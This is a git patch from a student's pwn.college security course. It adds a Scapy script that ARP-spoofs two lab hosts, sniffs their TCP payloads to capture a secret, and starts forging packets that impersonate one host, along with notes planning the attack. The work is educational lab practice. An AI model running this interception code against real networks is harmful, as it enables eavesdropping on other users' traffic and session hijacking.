From 0513792a0db62b271bf94a22abf8b2238c132b2f Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Mon, 23 Sep 2024 15:00:24 -0700 Subject: [PATCH] almost done with project 3 --- 3.14/scapy_mitm_arping.py | 142 ++++++++++++++++++++++++++++++++++++++ Dojo Notes.md | 33 ++++++++- 2 files changed, 173 insertions(+), 2 deletions(-) create mode 100644 3.14/scapy_mitm_arping.py diff --git a/3.14/scapy_mitm_arping.py b/3.14/scapy_mitm_arping.py new file mode 100644 index 0000000..a1b8a48 --- /dev/null +++ b/3.14/scapy_mitm_arping.py @@ -0,0 +1,142 @@ +import warnings +from argparse import ArgumentParser +from scapy.layers.l2 import Ether, ARP +from scapy.layers.inet import IP, TCP +from scapy.packet import Raw +from scapy.arch import get_if_addr, get_if_hwaddr +from scapy.sendrecv import srp1, sendp, sniff + +WHO_HAS = 1 +IS_AT = 2 +MAIN_IF = "eth0" + +main_if_mac = get_if_hwaddr(MAIN_IF) +main_if_ip = get_if_addr(MAIN_IF) +broadcast_mac = "ff:ff:ff:ff:ff:ff" + +target_1_ip = "10.0.0.3" +target_2_ip = "10.0.0.4" + +target_1_mac = "" +target_2_mac = "" + +prev_load = "" + +flag_mode = False + + +def get_target_macs(): + pkt_1 = Ether() / ARP() + pkt_1[Ether].src = main_if_mac + pkt_1[Ether].dst = broadcast_mac + pkt_1[ARP].op = WHO_HAS + pkt_1[ARP].hwsrc = main_if_mac + pkt_1[ARP].hwdst = broadcast_mac + pkt_1[ARP].psrc = main_if_ip + pkt_1[ARP].pdst = target_1_ip + + pkt_2 = pkt_1.copy() + pkt_2[ARP].pdst = target_2_ip + + ans_1 = srp1(pkt_1, iface=MAIN_IF) + ans_2 = srp1(pkt_2, iface=MAIN_IF) + target_1_mac = ans_1[ARP].hwsrc + target_2_mac = ans_2[ARP].hwsrc + + return (target_1_mac, target_2_mac) + + +def spoof_target(target_ip, target_mac, fake_ip): + # pretend that fake_ip is at main_if_mac + pkt = Ether() / ARP() + pkt[Ether].src = main_if_mac + pkt[Ether].dst = target_mac + pkt[ARP].op = IS_AT + pkt[ARP].hwsrc = main_if_mac + pkt[ARP].hwdst = target_mac + pkt[ARP].psrc = fake_ip + pkt[ARP].pdst = target_ip + + sendp(pkt, iface=MAIN_IF) + + +def handle_secret(secret, port, seq, ack): + global flag_mode + if not flag_mode: + print("Secret:", secret) + return + # masquerade as target_2 and talk to target_1 + global target_1_mac + global target_2_mac + global target_1_ip + global target_2_ip + pkt = Ether() / IP() / TCP() + pkt[Ether].src = target_2_mac + pkt[Ether].dst = target_1_mac + pkt[IP].src = target_2_ip + pkt[IP].dst = target_1_ip + pkt[TCP].sport = port + pkt[TCP].dport = 31337 # target_1 always listens on this port + pkt[TCP].seq = seq + pkt[TCP].ack = ack + pkt[TCP].flags = 0x02 # SYN (???) + pkt.show() + + +def packet_handler(pkt): + global prev_load + print( + str(pkt[IP].src) + ":" + str(pkt[TCP].sport), + ">", + str(pkt[IP].dst) + ":" + str(pkt[TCP].dport), + ) + raw_load = pkt[Raw].load.decode("utf-8") + secret = "" + if raw_load != prev_load: + if prev_load.startswith("SECRET"): + secret = raw_load.strip() + handle_secret( + secret, port=pkt[TCP].sport, seq=pkt[TCP].seq, ack=pkt[TCP].ack + ) + prev_load = raw_load + print(raw_load, end="") + + +def capture_packets(): + sniff(prn=packet_handler, iface=MAIN_IF, lfilter=lambda x: x.haslayer(Raw)) + + +if __name__ == "__main__": + parser = ArgumentParser() + parser.add_argument( + "-l", "--list-macs", required=False, dest="list_macs", action="store_true" + ) + parser.add_argument( + "-s", "--arp-spoof", required=False, dest="arp_spoof", action="store_true" + ) + parser.add_argument( + "-c", "--capture", required=False, dest="capture", action="store_true" + ) + parser.add_argument( + "-i", "--infiltrate", required=False, dest="infiltrate", action="store_true" + ) + + args = parser.parse_args() + if args.arp_spoof and not args.list_macs: + args.list_macs = True + warnings.warn("Warning: spoofing needs MAC addresses, acquiring them first") + + if args.infiltrate: + flag_mode = True + + if args.list_macs: + target_1_mac, target_2_mac = get_target_macs() + print(target_1_ip + " is at " + target_1_mac) + print(target_2_ip + " is at " + target_2_mac) + + if args.arp_spoof: + spoof_target(target_1_ip, target_1_mac, target_2_ip) + spoof_target(target_2_ip, target_2_mac, target_1_ip) + + if args.capture: + capture_packets() diff --git a/Dojo Notes.md b/Dojo Notes.md index b2cb2f2..c3b26f7 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -1,4 +1,4 @@ -# CSE 545 pwn.college Dojo +# CSE 545 - Fall '24 pwn.college Dojo ## Project 01 Linux Lifter @@ -61,7 +61,7 @@ - mangling is adding 3 then xor with 2. so just xor with 2, then subtract 3 -#### lab 2a.02 +### lab 2a.02 ![lab code snippet](ss2.png) @@ -203,6 +203,8 @@ nc 10.0.0.142 31337 - craft Ether packet to given dest addr with type `0xFFFF` - `srp(pkt, iface='eth0')` +### lab 3a was chill, no notes + ### .09 - IP scapy - similar @@ -226,3 +228,30 @@ nc 10.0.0.142 31337 - send ACK with next syn and ack numbers ### .12 - ARP scapy + +- meh, arp opcode is 2 + +### .13 - ARP spoofing + +- meh, just crafting ARP and tcpdump + +### lab 3b was chill, no notes + +### .14 - MiTM ARPing + +- shit's getting too easy, let's not look at /challenge/run +- first, get target's macs, then arp spoof +- we don't have NET_ADMIN, so can't set ip_forward in sysctl to control MITM directly, +- first, capture packets, check raw loads +- we observe that a sequence repeats: + - 10.0.0.3:31337 sends a command: "SECRET", to 10.0.0.4 at a random port + - note: how does 3 know which port to send to? + - 4 responds with a secret, it's in ascii? + - 3 sends a list of available (?) commands - echo, flag, and then asks for a command + - 4 responds with echo, and sends "Hello, World!" + - 3 echoes it back +- connection closes, repeats with another randomized port for 4 +- note that 3 sends a secret and a list of commands that includes a flag command +- craft a packet masquerading as 4, with the flag command, wait for a secret to arrive and put it in the packet +- in the time it takes 3 to do the legitimate echo from 4, we could probably send the flag command to 3 and have it processed in the same ephemeral connection +- let's try